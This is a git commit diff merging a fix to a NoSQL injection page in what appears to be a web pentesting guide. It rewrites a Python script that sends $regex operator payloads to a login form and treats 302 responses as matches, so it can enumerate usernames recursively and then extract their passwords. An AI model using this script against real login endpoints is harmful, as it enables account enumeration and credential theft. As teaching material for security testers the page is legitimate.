Merge pull request #754 from ChrisPritchard/patch-1

Update nosql-injection.md with fixed brute force script
2024-11-15 01:17:36 +00:00 · 2024-01-14 23:47:35 +01:00 · 2024-01-14 23:47:35 +01:00 · a086c07146
commit a086c07146
parent 2fc0778f90 4b445305da
1 changed files with 7 additions and 18 deletions
--- a/pentesting-web/nosql-injection.md
+++ b/pentesting-web/nosql-injection.md
@ -246,31 +246,20 @@ def get_password(username):
            print("Found password "+password[1:].replace("\\", "")+" for username "+username)
            return password[1:].replace("\\", "")

-def get_usernames():
+def get_usernames(prefix):
    usernames = []
-    params = {"username[$regex]":"", "password[$regex]":".*", "login": "login"}
+    params = {"username[$regex]":"", "password[$regex]":".*"}
    for c in possible_chars:
-        username = "^" + c
+        username = "^" + prefix + c
        params["username[$regex]"] = username + ".*"
        pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
        if int(pr.status_code) == 302:
-            print("Found username starting with "+c)
-            while True:
-                for c2 in possible_chars:
-                    params["username[$regex]"] = username + c2 + ".*"
-                    if int(requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False).status_code) == 302:
-                        username += c2
-                        print(username)
-                        break
-
-                if c2 == possible_chars[-1]:
-                    print("Found username: "+username[1:])
-                    usernames.append(username[1:])
-                    break
+            print(username)
+            for user in get_usernames(prefix + c):
+                usernames.append(user)
    return usernames

-
-for u in get_usernames():
+for u in get_usernames(""):
    get_password(u)
 ```